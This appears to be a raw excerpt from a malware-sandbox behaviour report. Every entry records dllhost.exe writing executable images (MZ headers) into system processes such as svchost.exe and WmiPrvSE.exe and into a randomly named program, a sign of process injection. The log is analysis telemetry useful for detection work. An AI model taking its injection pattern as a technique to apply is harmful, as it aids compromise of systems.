Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
